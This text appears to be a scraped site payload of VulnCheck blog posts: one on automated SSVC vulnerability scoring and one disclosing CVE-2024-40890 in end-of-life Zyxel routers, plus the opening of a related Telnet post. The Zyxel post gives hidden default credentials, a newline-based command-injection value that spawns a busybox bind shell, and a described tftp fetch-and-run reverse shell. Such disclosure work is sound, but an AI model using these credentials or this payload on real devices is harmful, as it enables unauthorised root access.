For defenders, the key takeaway is to prioritize the remediation of vulnerabilities using an ",[47,54457,54460],{"href":54458,"rel":54459},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fvulnerability-prioritization",[51],"evidence-based approach",[61,54462,202],{"id":201},[18,54464,45062],{},[18,54466,208],{},[18,54468,211,54469,45071],{},[47,54470,216],{"href":214,"rel":54471},[51],{"title":219,"searchDepth":220,"depth":220,"links":54473},[54474,54475,54476,54477,54478,54479,54480,54481,54482,54483],{"id":3520,"depth":220,"text":20},{"id":53963,"depth":220,"text":53964},{"id":54153,"depth":220,"text":54154},{"id":54201,"depth":220,"text":54202},{"id":54212,"depth":220,"text":54213},{"id":54327,"depth":220,"text":54328},{"id":54350,"depth":220,"text":54351},{"id":54380,"depth":220,"text":54381},{"id":54449,"depth":220,"text":54450},{"id":201,"depth":220,"text":202},"2025-02-24",{"slug":54486},"black-basta-chats","\u002Fblog\u002Fblack-basta-chats",{"title":53880,"description":53957},"blog\u002Fblack-basta-chats",[1280,242,1279],"gaVI_OUpWtT5kwK3mSJ-kF9M7oCWIFd-teGPIVuuOYE",{"id":54493,"title":54494,"articles":7,"authors":54495,"body":54497,"date":54944,"description":54945,"extension":234,"image":7,"link":7,"meta":54946,"navigation":237,"path":54948,"seo":54949,"series":7,"stem":54950,"subtype":7,"tags":54951,"__hash__":54952},"blog\u002Fblog\u002Fautomating-ssvc.md","Helping Enterprises & Governments Adopt Stakeholder Specific Vulnerability Categorization (SSVC)",[54496],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":54498,"toc":54937},[54499,54520,54523,54531,54535,54543,54547,54550,54585,54588,54614,54617,54643,54647,54650,54656,54659,54845,54849,54852,54855,54924,54926,54928,54930,54935],[18,54500,54501,54502,54507,54508,54513,54514,54519],{},"Stakeholder Specific Vulnerability Categorization (SSVC) is a methodology for prioritizing vulnerabilities that was created at 
",[47,54503,54506],{"href":54504,"rel":54505},"https:\u002F\u002Finsights.sei.cmu.edu\u002Flibrary\u002Fprioritizing-vulnerability-response-a-stakeholder-specific-vulnerability-categorization\u002F",[51],"Carnegie Mellon’s Software Engineering Institute"," and has largely been popularized by the ",[47,54509,54512],{"href":54510,"rel":54511},"https:\u002F\u002Fwww.cisa.gov\u002Fstakeholder-specific-vulnerability-categorization-ssvc",[51],"Cybersecurity & Infrastructure Security Agency",", which encourages federal agencies and enterprises to modernize their approach to vulnerability management. In 2024, CISA released ",[47,54515,54518],{"href":54516,"rel":54517},"https:\u002F\u002Fgithub.com\u002Fcisagov\u002Fvulnrichment",[51],"Vulnrichment",", an effort to enrich CVE records with SSVC decisions, which has set a foundational example of how to implement SSVC.",[18,54521,54522],{},"After hearing from federal agencies and enterprise organizations adopting SSVC across their vulnerability management programs, we set out to automate the creation of SSVC decisions across all CVEs to help make SSVC adoption a more realistic possibility.",[18,54524,54525,54526,54530],{},"Example CISA SSVC Decision Tree\n",[68,54527],{"alt":54528,"src":54529,"width":28205},"CISA SSVC","\u002Fblog\u002Fautomating-ssvc\u002Fcisa-ssvc.png","\nSource: CISA SSVC",[61,54532,54534],{"id":54533},"what-ssvc-decisions-has-vulncheck-automated","What SSVC decisions has VulnCheck automated?",[18,54536,54537,54538,59],{},"We’ve focused on automating the creation of SSVC decisions that can be generated from existing vulnerability and exploitation intelligence, which include the Exploitation, Automatable and Total Impact decisions. 
We follow the same structure for the SSVC decisions as outlined in ",[47,54539,54542],{"href":54540,"rel":54541},"https:\u002F\u002Fwww.cisa.gov\u002Fsites\u002Fdefault\u002Ffiles\u002Fpublications\u002Fcisa-ssvc-guide%20508c.pdf",[51],"CISA’s SSVC Guide",[61,54544,54546],{"id":54545},"what-criteria-does-vulncheck-use-for-generating-ssvc-decisions","What Criteria Does VulnCheck Use for Generating SSVC Decisions?",[18,54548,54549],{},"Exploitation Decision",[307,54551,54552,54560],{},[310,54553,54554],{},[313,54555,54556,54558],{},[316,54557,2750],{},[316,54559,42172],{},[336,54561,54562,54570,54577],{},[313,54563,54564,54567],{},[341,54565,54566],{},"None",[341,54568,54569],{},"There is no evidence of active exploitation and no public proof of concept (PoC) of how to exploit the vulnerability.",[313,54571,54572,54574],{},[341,54573,32535],{},[341,54575,54576],{},"A known PoC exploit exists, sourced from VulnCheck’s Exploit Intelligence. This includes proof-of-concept, commercial and weaponized exploits.",[313,54578,54579,54582],{},[341,54580,54581],{},"Active",[341,54583,54584],{},"Reliable evidence that cyber threat actors have used the exploit in the wild, sourced from VulnCheck KEV, which references credible sources.",[18,54586,54587],{},"Technical Impact Decision",[307,54589,54590,54598],{},[310,54591,54592],{},[313,54593,54594,54596],{},[316,54595,2750],{},[316,54597,42172],{},[336,54599,54600,54607],{},[313,54601,54602,54604],{},[341,54603,32603],{},[341,54605,54606],{},"CVSS metrics are used to identify when a decision node is Technical Impact:Partial. When the CVSS metrics are not equal to ConfidentialityImpact: \"HIGH\", IntegrityImpact: \"HIGH\", the vulnerability is marked Partial.",[313,54608,54609,54611],{},[341,54610,3643],{},[341,54612,54613],{},"CVSS metrics are used to identify when a decision node is Technical Impact:Total. 
When the CVSS metrics are equal to ConfidentialityImpact: \"HIGH\", IntegrityImpact: \"HIGH\", the vulnerability is marked Total.",[18,54615,54616],{},"Automatable Decision",[307,54618,54619,54627],{},[310,54620,54621],{},[313,54622,54623,54625],{},[316,54624,2750],{},[316,54626,42172],{},[336,54628,54629,54636],{},[313,54630,54631,54633],{},[341,54632,383],{},[341,54634,54635],{},"CVSS metrics are used to identify when a decision node is automatable. The CVE is marked as automatable when the vulnerability is not a memory corruption vulnerability and the CVSS metrics are equal to AttackVector: \"NETWORK\", PrivilegesRequired: \"NONE\", UserInteraction: \"NONE\", AttackComplexity: \"LOW\".",[313,54637,54638,54640],{},[341,54639,359],{},[341,54641,54642],{},"Vulnerabilities that do not meet the conditions listed for automatable = Yes are marked as non-automatable.",[61,54644,54646],{"id":54645},"how-can-i-compare-the-difference-between-cisa-vulnrichment-ssvc-decisions-and-vulncheck","How can I compare the difference between CISA Vulnrichment SSVC decisions and VulnCheck?",[18,54648,54649],{},"We’ve included CISA Vulnrichment alongside VulnCheck SSVC so you can compare VulnCheck’s decisions against CISA’s. 
Notable differences include a significant increase in CVE coverage, more exploitation evidence and more timely SSVC node generation.",[18,54651,54652],{},[68,54653],{"alt":54654,"src":54655,"width":28205},"SSVC Example","\u002Fblog\u002Fautomating-ssvc\u002Fssvc-example.png",[18,54657,54658],{},"VulnCheck-NVD2 API Response Example",[1354,54660,54662],{"className":22307,"code":54661,"language":22309,"meta":219,"style":219},"\"ssvc\": [\n  {\n    \"source\": \"CISA-ADP\",\n    \"exploitation\": \"POC\",\n    \"automatable\": \"NO\",\n    \"technicalImpact\": \"TOTAL\"\n  },\n  {\n    \"source\": \"VulnCheck\",\n    \"exploitation\": \"ACTIVE\",\n    \"automatable\": \"NO\",\n    \"technicalImpact\": \"TOTAL\"\n  }\n],\n",[886,54663,54664,54677,54681,54699,54718,54738,54756,54760,54764,54782,54801,54819,54835,54839],{"__ignoreMap":219},[1373,54665,54666,54668,54671,54673,54675],{"class":1375,"line":1376},[1373,54667,183],{"class":1387},[1373,54669,54670],{"class":1391},"ssvc",[1373,54672,183],{"class":1387},[1373,54674,20051],{"class":4640},[1373,54676,9050],{"class":1383},[1373,54678,54679],{"class":1375,"line":220},[1373,54680,26177],{"class":1383},[1373,54682,54683,54685,54687,54689,54691,54693,54695,54697],{"class":1375,"line":1266},[1373,54684,19050],{"class":9152},[1373,54686,43556],{"class":9155},[1373,54688,183],{"class":9152},[1373,54690,4606],{"class":1383},[1373,54692,4883],{"class":9173},[1373,54694,21877],{"class":9176},[1373,54696,183],{"class":9173},[1373,54698,9062],{"class":1383},[1373,54700,54701,54703,54705,54707,54709,54711,54714,54716],{"class":1375,"line":1852},[1373,54702,19050],{"class":9152},[1373,54704,31287],{"class":9155},[1373,54706,183],{"class":9152},[1373,54708,4606],{"class":1383},[1373,54710,4883],{"class":9173},[1373,54712,54713],{"class":9176},"POC",[1373,54715,183],{"class":9173},[1373,54717,9062],{"class":1383},[1373,54719,54720,54722,54725,54727,54729,54731,54734,54736],{"class":1375,"line":4692},[1373,54721,19050],{"class":9152},
[1373,54723,54724],{"class":9155},"automatable",[1373,54726,183],{"class":9152},[1373,54728,4606],{"class":1383},[1373,54730,4883],{"class":9173},[1373,54732,54733],{"class":9176},"NO",[1373,54735,183],{"class":9173},[1373,54737,9062],{"class":1383},[1373,54739,54740,54742,54745,54747,54749,54751,54754],{"class":1375,"line":4724},[1373,54741,19050],{"class":9152},[1373,54743,54744],{"class":9155},"technicalImpact",[1373,54746,183],{"class":9152},[1373,54748,4606],{"class":1383},[1373,54750,4883],{"class":9173},[1373,54752,54753],{"class":9176},"TOTAL",[1373,54755,19057],{"class":9173},[1373,54757,54758],{"class":1375,"line":4756},[1373,54759,23985],{"class":1383},[1373,54761,54762],{"class":1375,"line":4768},[1373,54763,26177],{"class":1383},[1373,54765,54766,54768,54770,54772,54774,54776,54778,54780],{"class":1375,"line":4792},[1373,54767,19050],{"class":9152},[1373,54769,43556],{"class":9155},[1373,54771,183],{"class":9152},[1373,54773,4606],{"class":1383},[1373,54775,4883],{"class":9173},[1373,54777,2709],{"class":9176},[1373,54779,183],{"class":9173},[1373,54781,9062],{"class":1383},[1373,54783,54784,54786,54788,54790,54792,54794,54797,54799],{"class":1375,"line":4798},[1373,54785,19050],{"class":9152},[1373,54787,31287],{"class":9155},[1373,54789,183],{"class":9152},[1373,54791,4606],{"class":1383},[1373,54793,4883],{"class":9173},[1373,54795,54796],{"class":9176},"ACTIVE",[1373,54798,183],{"class":9173},[1373,54800,9062],{"class":1383},[1373,54802,54803,54805,54807,54809,54811,54813,54815,54817],{"class":1375,"line":4806},[1373,54804,19050],{"class":9152},[1373,54806,54724],{"class":9155},[1373,54808,183],{"class":9152},[1373,54810,4606],{"class":1383},[1373,54812,4883],{"class":9173},[1373,54814,54733],{"class":9176},[1373,54816,183],{"class":9173},[1373,54818,9062],{"class":1383},[1373,54820,54821,54823,54825,54827,54829,54831,54833],{"class":1375,"line":4817},[1373,54822,19050],{"class":9152},[1373,54824,54744],{"class":9155},[1373,54826,183],{"class":9152}
,[1373,54828,4606],{"class":1383},[1373,54830,4883],{"class":9173},[1373,54832,54753],{"class":9176},[1373,54834,19057],{"class":9173},[1373,54836,54837],{"class":1375,"line":4825},[1373,54838,27147],{"class":1383},[1373,54840,54841,54843],{"class":1375,"line":4835},[1373,54842,15050],{"class":1383},[1373,54844,9062],{"class":4640},[61,54846,54848],{"id":54847},"how-does-ssvc-coverage-compare-between-vulncheck-and-cisa-vulnrichment","How does SSVC Coverage Compare between VulnCheck and CISA Vulnrichment?",[18,54850,54851],{},"VulnCheck currently has SSVC coverage for 244,866 CVEs, while CISA Vulnrichment has SSVC coverage for only 64,142 CVEs.",[18,54853,54854],{},"We’ve calculated a CISA \u002F VulnCheck match rate for each decision node: the percentage of CISA Vulnrichment decisions that VulnCheck’s decision matches. It's worth mentioning that when we manually audited mismatched decisions, we often found inconsistencies in the decision generated by CISA; we believe our match rates would be higher if those decisions were correct. 
This is common for manually generated vulnerability data that often lacks data validation.",[307,54856,54857,54867],{},[310,54858,54859],{},[313,54860,54861,54864],{},[316,54862,54863],{},"CISA SSVC Decision",[316,54865,54866],{},"VulnCheck SSVC Decision Match Rate",[336,54868,54869,54876,54884,54892,54900,54908,54916],{},[313,54870,54871,54874],{},[341,54872,54873],{},"exploitation:active",[341,54875,10862],{},[313,54877,54878,54881],{},[341,54879,54880],{},"exploitation:poc",[341,54882,54883],{},"86.7%",[313,54885,54886,54889],{},[341,54887,54888],{},"exploitation:none",[341,54890,54891],{},"90.6%",[313,54893,54894,54897],{},[341,54895,54896],{},"automatable:yes",[341,54898,54899],{},"88.9%",[313,54901,54902,54905],{},[341,54903,54904],{},"automatable:no",[341,54906,54907],{},"92.3%",[313,54909,54910,54913],{},[341,54911,54912],{},"technicalimpact:total",[341,54914,54915],{},"95.2%",[313,54917,54918,54921],{},[341,54919,54920],{},"technicalimpact:partial",[341,54922,54923],{},"85.6%",[61,54925,202],{"id":201},[18,54927,45062],{},[18,54929,208],{},[18,54931,211,54932,45071],{},[47,54933,216],{"href":214,"rel":54934},[51],[2901,54936,22694],{},{"title":219,"searchDepth":220,"depth":220,"links":54938},[54939,54940,54941,54942,54943],{"id":54533,"depth":220,"text":54534},{"id":54545,"depth":220,"text":54546},{"id":54645,"depth":220,"text":54646},{"id":54847,"depth":220,"text":54848},{"id":201,"depth":220,"text":202},"2025-02-13","VulnCheck now provides automated SSVC decisions for federal and enterprise 
agencies.",{"slug":54947},"automating-ssvc","\u002Fblog\u002Fautomating-ssvc",{"title":54494,"description":54945},"blog\u002Fautomating-ssvc",[1280,242,1279],"QV7gc_QqTfs0CA1IHzPAv56kA9kN-e5G0e48qr_bbfM",{"id":54954,"title":54955,"articles":7,"authors":54956,"body":54958,"date":55249,"description":55250,"extension":234,"image":7,"link":7,"meta":55251,"navigation":237,"path":55253,"seo":55254,"series":7,"stem":55255,"subtype":7,"tags":55256,"__hash__":55257},"blog\u002Fblog\u002Fzyxel-http-vuln.md","Zyxel HTTP Vulnerability",[54957],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":54959,"toc":55244},[54960,54962,54980,55018,55044,55047,55051,55066,55090,55096,55120,55126,55139,55145,55148,55152,55168,55174,55177,55181,55195,55202,55208,55211,55213,55216,55218,55233],[1920,54961,11648],{"id":11647},[18,54963,54964,54965,54970,54971,54975,54976,54979],{},"VulnCheck independently discovered vulnerabilities affecting Zyxel Customer Premises Equipment (CPE) after running into the hardware in the real world. Earlier this week, ",[47,54966,54969],{"href":54967,"rel":54968},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fzyxel-telnet-vulns",[51],"we detailed Telnet vulnerabilities"," that our colleagues at ",[47,54972,11029],{"href":54973,"rel":54974},"https:\u002F\u002Fwww.greynoise.io\u002Fblog\u002Factive-exploitation-of-zero-day-zyxel-cpe-vulnerability-cve-2024-40891",[51]," observed being actively exploited. This follow-up blog examines a separate issue, a (sort of) authenticated vulnerability in the web interface that allows code execution as the root user. 
We believe, but have not received confirmation from the vendor, that ",[1131,54977,54978],{},"at least"," the following Zyxel CPE routers are affected:",[22,54981,54982,54985,54988,54991,54994,54997,55000,55003,55006,55009,55012,55015],{},[25,54983,54984],{},"VMG1312-B10A",[25,54986,54987],{},"VMG1312-B10B",[25,54989,54990],{},"VMG1312-B10E",[25,54992,54993],{},"VMG3312-B10A",[25,54995,54996],{},"VMG3313-B10A",[25,54998,54999],{},"VMG3926-B10B",[25,55001,55002],{},"VMG4325-B10A",[25,55004,55005],{},"VMG4380-B10A",[25,55007,55008],{},"VMG8324-B10A",[25,55010,55011],{},"VMG8924-B10A",[25,55013,55014],{},"SBG3300",[25,55016,55017],{},"SBG3500",[18,55019,55020,55021,55025,55026,55031,55032,55037,55038,55043],{},"As noted in our previous blog, these older routers remain accessible on the internet. Search engines vary in their estimates of exposure. ",[47,55022,41731],{"href":55023,"rel":55024},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=http.html_hash%3A1512052042+http.headers_hash%3A-2068755711",[51]," flags ~3,500 devices with an exposed administrative HTTP interface, 
",[47,55027,55030],{"href":55028,"rel":55029},"https:\u002F\u002Fsearch.censys.io\u002Fsearch?resource=hosts&sort=RELEVANCE&per_page=25&virtual_hosts=EXCLUDE&q=services.http.response.html_title%3A%22VMG1312-B10A%22+or+services.http.response.html_title%3A%22VMG1312-B10B%22+or+services.http.response.html_title%3A%22VMG1312-B10E%22+or+services.http.response.html_title%3A%22VMG1312-B10B%22+or+services.http.response.html_title%3A%22VMG3312-B10A%22+or+services.http.response.html_title%3A%22VMG3313-B10A%22+or+services.http.response.html_title%3A%22VMG3926-B10B%22+or+services.http.response.html_title%3A%22VMG4325-B10A%22+or+services.http.response.html_title%3A%22VMG4380-B10A%22+or+services.http.response.html_title%3A%22VMG8324-B10A%22+or+services.http.response.html_title%3A%22VMG8924-B10A%22+or+services.http.response.html_title%3A%22SBG3300%22+or+services.http.response.html_title%3A%22SBG3500%22",[51],"Censys"," ~1,250, ",[47,55033,55036],{"href":55034,"rel":55035},"https:\u002F\u002Fen.fofa.info\u002Fresult?qbase64=KCJWTUcxMzEyLUIxMEEiIHx8ICJWTUcxMzEyLUIxMEIiIHx8ICJWTUcxMzEyLUIxMEUiIHx8ICJWTUcxMzEyLUIxMEIiIHx8ICJWTUczMzEyLUIxMEEiIHx8ICJWTUczMzEzLUIxMEEiIHx8ICJWTUczOTI2LUIxMEIiIHx8ICJWTUc0MzI1LUIxMEEiIHx8ICJWTUc0MzgwLUIxMEEiIHx8ICJWTUc4MzI0LUIxMEEiIHx8ICJWTUc4OTI0LUIxMEEiIHx8ICJTQkczMzAwIiB8fCAiU0JHMzUwMCIpICYmIHNlcnZlcj09Im1pY3JvX2h0dHBkIg%3D%3D",[51],"FOFA"," ~20,000, and ",[47,55039,55042],{"href":55040,"rel":55041},"https:\u002F\u002Fwww.zoomeye.ai\u002FsearchResult?q=KHRpdGxlPSJWTUcxMzEyLUIxMEEiIHx8IHRpdGxlPSJWTUcxMzEyLUIxMEIiIHx8IHRpdGxlPSJWTUcxMzEyLUIxMEUiIHx8IHRpdGxlPSJWTUcxMzEyLUIxMEIiIHx8IHRpdGxlPSJWTUczMzEyLUIxMEEiIHx8IHRpdGxlPSJWTUczMzEzLUIxMEEiIHx8IHRpdGxlPSJWTUczOTI2LUIxMEIiIHx8IHRpdGxlPSJWTUc0MzI1LUIxMEEiIHx8IHRpdGxlPSJWTUc0MzgwLUIxMEEiIHx8IHRpdGxlPSJWTUc4MzI0LUIxMEEiIHx8IHRpdGxlPSJWTUc4OTI0LUIxMEEiIHx8IHRpdGxlPSJTQkczMzAwIiB8fCB0aXRsZT0iU0JHMzUwMCIpICYmIGh0dHAuaGVhZGVyLnNlcnZlcj0ibWljcm9faHR0cGQi",[51],"ZoomEye"," ~ 1,500. 
Each search engine finds devices in multiple regions, including the United States, Turkey, Philippines, South Africa, and France.",[18,55045,55046],{},"VulnCheck does not have access to all affected models. For the remainder of this blog, all images and exploitation details will be based on our reference device, the VMG4325-B10A, running firmware version 1.00(AAFR.4)C0_20170615.",[1920,55048,55050],{"id":55049},"cve-2024-40890-authenticated-http-vulnerability","CVE-2024-40890: Authenticated HTTP Vulnerability",[18,55052,55053,55054,55057,55058,55061,55062,55065],{},"The administrative HTTP interface is vulnerable to an authenticated command injection via ",[886,55055,55056],{},"\u002Fpages\u002FtabFW\u002Fdisagnostic-general.cgi"," (sic). Notably, on our test device, the hidden credentials (",[886,55059,55060],{},"supervisor:zyad1234","), previously discussed in our last blog, work on the HTTP interface, as does the provisioned ",[886,55063,55064],{},"zyuser:1234"," account. The presence of a working hidden and\u002For an undocumented default account effectively makes this vulnerability exploitable without authentication.",[18,55067,2245,55068,55071,55072,55075,55076,55079,55080,55083,55084,55087,55088,31686],{},[886,55069,55070],{},"httpd"," binary processes ",[886,55073,55074],{},".cgi"," requests through the ",[886,55077,55078],{},"do_cgi"," function. 
Specifically, handling for ",[886,55081,55082],{},"disagnostic-general.cgi"," appears as follows (note that the firmware manipulates file extensions during processing, which is why ",[886,55085,55086],{},".html"," appears instead of ",[886,55089,55074],{},[18,55091,55092],{},[68,55093],{":width":10862,"alt":55094,"src":55095},"Decompiled view of disagnostic-general.cgi handling","\u002Fblog\u002Fzyxel-http-vuln\u002Fdisagnostic-handling.png",[18,55097,55098,55101,55102,55105,55106,55108,55109,55112,55113,55116,55117,4606],{},[886,55099,55100],{},"local_1028"," represents the requested CGI script, while ",[886,55103,55104],{},"uVar8"," maps to an HTTP parameter, diagAddr, used by ",[886,55107,55082],{},". Above, we can see that ",[886,55110,55111],{},"diagAddr"," is passed into a function called ",[886,55114,55115],{},"cmsUtl_isUnsafeString",". The function is reasonably effective, blocking common shell metacharacters and more: ",[886,55118,55119],{},"”\u003C>%\\^`[]\\+$=#&:;(){}|\u002F",[18,55121,55122],{},[68,55123],{":width":10862,"alt":55124,"src":55125},"Decompiled view of unsafe string","\u002Fblog\u002Fzyxel-http-vuln\u002Funsafestring.png",[18,55127,55128,55129,55131,55132,55135,55136,59],{},"However, the filter fails to block the newline character, which proves fatal. The attacker-controlled ",[886,55130,55111],{}," parameter (newline and all) is passed to ",[886,55133,55134],{},"cgiSetDiagnostic",", which eventually triggers a fork using ",[886,55137,55138],{},"\u002Fbin\u002Fsh -c {command} {diagAddr}",
The attacker needs to complete two setup steps: authenticate to obtain a ",[886,55156,55157],{},"SESSION"," cookie, and retrieve a CSRF token from ",[886,55160,55161],{},"\u002Fpages\u002Fmaintenance\u002Fdisagnostic\u002FpingTest.html",". From there, executing a bind shell is as straightforward as appending ",[886,55164,55165],{},"\\nbusybox+telnetd+-l+sh+-p+1270",[886,55167,55111],{},[18,55169,55170],{},[68,55171],{":width":10862,"alt":55172,"src":55173},"Exploitation for bindshell","\u002Fblog\u002Fzyxel-http-vuln\u002Fbindshell.png",[18,55175,55176],{},"With a bind shell established, the next step is exploring reverse shell options. Unlike a bind shell, this presents additional challenges due to input filtering.",[61,55178,55180],{"id":55179},"reverse-shell","Reverse Shell",[18,55182,55183,55184,55186,55187,982,55189,55191,55192,55194],{},"Establishing a reverse shell is a bit more complicated due to ",[886,55185,55115],{},". The usual redirect-based reverse shells using telnet, nc, or openssl are blocked by metacharacter filtering. Additionally, the function restricts both ",[886,55188,4606],{},[886,55190,2180],{},", preventing the use of ",[886,55193,1553],{}," (busybox variant) despite it being available on the system.",[18,55196,55197,55198,55201],{},"The solution we landed on was using the tftp binary (busybox variant) to fetch and execute a compiled payload. 
Below, you can see that it plays out fairly simply: we download a binary as ",[886,55199,55200],{},"\u002Fhom\u002Fbin\u002Fl"," and execute it.",[18,55203,55204],{},[68,55205],{":width":10862,"alt":55206,"src":55207},"Exploitation for reverse shell","\u002Fblog\u002Fzyxel-http-vuln\u002Freverseshell.png",[18,55209,55210],{},"By combining weak input filtering, poor credential practices, and an exposed administrative interface, this vulnerability provides attackers with a straightforward path to remote code execution.",[1920,55212,1903],{"id":1902},[18,55214,55215],{},"The device’s default accounts and command injection vulnerabilities present a serious security risk. While these routers are aging and officially unsupported, thousands remain exposed online. Unfortunately, unsupported does not mean unexploited. This research underscores the lasting risks posed by insecure, internet-facing infrastructure that has been abandoned by the vendor.",[61,55217,202],{"id":201},[18,55219,53821,55220,1246,55223,1246,55226,1255,55230],{},[47,55221,40447],{"href":53829,"rel":55222},[51],[47,55224,36637],{"href":53833,"rel":55225},[51],[47,55227,55229],{"href":53837,"rel":55228},[51],"Fileless Remote Code Execution on Juniper Firewalls\n",[47,55231,22211],{"href":53842,"rel":55232},[51],[18,55234,53846,55235,53850,55238,982,55241,1260],{},[47,55236,1233],{"href":2871,"rel":55237},[51],[47,55239,1245],{"href":45535,"rel":55240},[51],[47,55242,216],{"href":214,"rel":55243},[51],{"title":219,"searchDepth":220,"depth":220,"links":55245},[55246,55247,55248],{"id":55150,"depth":220,"text":55151},{"id":55179,"depth":220,"text":55180},{"id":201,"depth":220,"text":202},"2025-02-07","As a follow-up to our previous Zyxel Telnet Vulnerabilities blog, VulnCheck examines CVE-2024-40890, a recently disclosed vulnerability in the HTTP interface of many end-of-life Zyxel CPE 
routers.",{"slug":55252},"zyxel-http-vuln","\u002Fblog\u002Fzyxel-http-vuln",{"title":54955,"description":55250},"blog\u002Fzyxel-http-vuln",[242,1281,1279],"enw6Anxxi92KhYAVNU8ilT7ZSuWs44CJ6ptI1DeEAug",{"id":55259,"title":55260,"articles":55261,"authors":55266,"body":55268,"date":57665,"description":57666,"extension":234,"image":7,"link":7,"meta":57667,"navigation":237,"path":57669,"seo":57670,"series":7,"stem":57671,"subtype":7,"tags":57672,"__hash__":57673},"blog\u002Fblog\u002Fzyxel-telnet-vulns.md","Zyxel Telnet Vulnerabilities",[55262],{"title":55263,"source":10841,"link":55264,"date":55265},"Critical Zyxel vulnerability under active exploitation after long period of quiet","https:\u002F\u002Fwww.cybersecuritydive.com\u002Fnews\u002Fvulnerability-zyxel-exploitation\u002F750922\u002F","2025-06-17",[55267],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":55269,"toc":57662},[55270,55272,55288,55314,55336,55342,55345,55351,55355,55372,55378,55391,55397,55422,55428,55437,55457,55471,56299,56307,56311,56324,56829,56832,56841,56861,56876,56882,56890,56909,56917,57040,57048,57053,57064,57067,57079,57088,57553,57557,57560,57627,57629,57632,57634,57648,57659],[1920,55271,11648],{"id":11647},[18,55273,55274,55275,55279,55280,55285,55286,54979],{},"VulnCheck independently discovered vulnerabilities affecting Zyxel Customer Premises Equipment (CPE) after running into the hardware in the real world. The combination of the vulnerabilities allows for unauthenticated code execution via Telnet. A week ago, our friends at GreyNoise ",[47,55276,55278],{"href":54973,"rel":55277},[51],"blogged"," about attackers actively using these vulnerabilities against their honeypot network, and the associated ",[47,55281,55284],{"href":55282,"rel":55283},"https:\u002F\u002Fviz.greynoise.io\u002Ftags\u002Fzyxel-cpe-cve-2024-40891-command-injection-attempt?days=10",[51],"tag"," continues to flag ongoing activity. 
We believe, but have not received confirmation from the vendor, that ",[1131,55287,54978],{},[22,55289,55290,55292,55294,55296,55298,55300,55302,55304,55306,55308,55310,55312],{},[25,55291,54984],{},[25,55293,54987],{},[25,55295,54990],{},[25,55297,54993],{},[25,55299,54996],{},[25,55301,54999],{},[25,55303,55002],{},[25,55305,55005],{},[25,55307,55008],{},[25,55309,55011],{},[25,55311,55014],{},[25,55313,55017],{},[18,55315,55316,55317,55322,55323,982,55327,55331,55332,59],{},"We’ve been informed that these affected routers are end-of-life, though not listed on ",[47,55318,55321],{"href":55319,"rel":55320},"https:\u002F\u002Fwebservice.zyxel.com\u002Fend-of-life",[51],"Zyxel’s EOL"," page. Despite this, both ",[47,55324,55036],{"href":55325,"rel":55326},"https:\u002F\u002Fen.fofa.info\u002Fresult?qbase64=KCJWTUcxMzEyLUIxMEEiIHx8ICJWTUcxMzEyLUIxMEIiIHx8ICJWTUcxMzEyLUIxMEUiIHx8ICJWTUcxMzEyLUIxMEIiIHx8ICJWTUczMzEyLUIxMEEiIHx8ICJWTUczMzEzLUIxMEEiIHx8ICJWTUczOTI2LUIxMEIiIHx8ICJWTUc0MzI1LUIxMEEiIHx8ICJWTUc0MzgwLUIxMEEiIHx8ICJWTUc4MzI0LUIxMEEiIHx8ICJWTUc4OTI0LUIxMEEiIHx8ICJTQkczMzAwIiB8fCAiU0JHMzUwMCIpICYmIHByb3RvY29sPSJ0ZWxuZXQi",[51],[47,55328,55030],{"href":55329,"rel":55330},"https:\u002F\u002Fsearch.censys.io\u002Fsearch?resource=hosts&sort=RELEVANCE&per_page=25&virtual_hosts=EXCLUDE&q=services.telnet.banner%3A%22VMG1312-B10A%22+or+services.telnet.banner%3A%22VMG1312-B10B%22+or+services.telnet.banner%3A%22VMG1312-B10E%22+or+services.telnet.banner%3A%22VMG1312-B10B%22+or+services.telnet.banner%3A%22VMG3312-B10A%22+or+services.telnet.banner%3A%22VMG3313-B10A%22+or+services.telnet.banner%3A%22VMG3926-B10B%22+or+services.telnet.banner%3A%22VMG4325-B10A%22+or+services.telnet.banner%3A%22VMG4380-B10A%22+or+services.telnet.banner%3A%22VMG8324-B10A%22+or+services.telnet.banner%3A%22VMG8924-B10A%22+or+services.telnet.banner%3A%22SBG3300%22+or+services.telnet.banner%3A%22SBG3500%22",[51]," identify approximately 1,500 affected systems with internet-facing Telnet interfaces. 
Additionally, some of these models are still available for purchase through ",[47,55333,33119],{"href":55334,"rel":55335},"https:\u002F\u002Fwww.amazon.com\u002Fstores\u002Fpage\u002FF26A3E2F-46D3-46C9-BCDA-3D4EA62563F6\u002Fsearch?terms=VMG4325-B10A",[51],[18,55337,55338],{},[68,55339],{":width":10862,"alt":55340,"src":55341},"EOL Router in Zyxel Store","\u002Fblog\u002Fzyxel-telnet-vulns\u002Famazon-store.png",[18,55343,55344],{},"While these systems are older and seemingly long out of support, they remain highly relevant due to their continued use worldwide and the sustained interest from attackers. The fact that attackers are still actively exploiting these routers underscores the need for attention, as understanding real-world attacks is critical to effective security research.",[18,55346,55347,55348,59],{},"VulnCheck does not have access to all affected models. For the remainder of this blog, all images and exploitation details will be based on our reference device, the VMG4325-B10A, running firmware version ",[886,55349,55350],{},"1.00(AAFR.4)C0_20170615",[1920,55352,55354],{"id":55353},"cve-2024-40891-telnet-authenticated-command-inject","CVE-2024-40891: Telnet Authenticated Command Inject",[18,55356,55357,55358,55363,55364,55367,55368,55371],{},"The device’s Telnet command processing is vulnerable to an authenticated command injection when the attacker has access with any user account. This vulnerability has been assigned ",[47,55359,55362],{"href":55360,"rel":55361},"https:\u002F\u002Fvulncheck.com\u002Fcve\u002FCVE-2024-40891",[51],"CVE-2024-40891",". Command processing is handled by the ",[886,55365,55366],{},"libcms_cli.so"," library, with most of the work occurring in the ",[886,55369,55370],{},"cli_processCliCmd"," function. 
